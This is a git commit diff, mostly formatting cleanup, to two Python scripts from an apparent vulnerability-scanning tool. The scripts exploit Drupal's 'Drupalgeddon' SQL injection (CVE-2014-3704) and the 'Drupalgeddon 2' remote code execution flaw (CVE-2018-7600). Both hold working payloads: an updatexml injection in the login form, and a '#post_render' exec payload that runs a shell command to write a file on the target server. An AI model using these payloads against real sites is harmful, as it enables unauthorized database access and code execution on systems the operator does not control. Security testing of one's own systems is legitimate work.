fix
This commit is contained in:
rpkr
@@ -1,8 +1,6 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
|
||||
'''
|
||||
Usage:
|
||||
@@ -10,27 +8,28 @@ Usage:
|
||||
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
||||
'''
|
||||
|
||||
|
||||
def attack(URL):
|
||||
url = URL+'/?q=node&destination=node'
|
||||
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||
|
||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||
Content_Type="application/x-www-form-urlencoded"
|
||||
headers={"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||
Content_Type = "application/x-www-form-urlencoded"
|
||||
headers = {"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||
|
||||
data ='pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||
data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||
try:
|
||||
r = requests.post(url,data=data, headers=headers, verify=False)
|
||||
soup=BeautifulSoup(r.content,"lxml")
|
||||
soup = BeautifulSoup(r.content,"lxml")
|
||||
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
||||
print('--------------------')
|
||||
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
||||
print('--------------------')
|
||||
except:
|
||||
except Exception:
|
||||
print('someerror!')
|
||||
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||
print('\n')
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
attack()
|
||||
|
||||
|
||||
@@ -7,9 +7,11 @@ Usage:
|
||||
moon.py -u drupal http://127.0.0.1:8080
|
||||
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
||||
'''
|
||||
|
||||
|
||||
def attack(URL):
|
||||
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
||||
# print(url)
|
||||
try:
|
||||
@@ -18,11 +20,11 @@ def attack(URL):
|
||||
if check.status_code != 200:
|
||||
sys.exit("Not exploitable")
|
||||
print('error!')
|
||||
print ('可能存在漏洞-Check: '+ URL +'/hello.txt ^w^')
|
||||
print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
|
||||
except:
|
||||
print('someerroe!')
|
||||
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||
print('\n')
|
||||
|
||||
if __name__ == "__main__":
|
||||
attack()
|
||||
attack()
|
||||
|
||||
Reference in New Issue
Block a user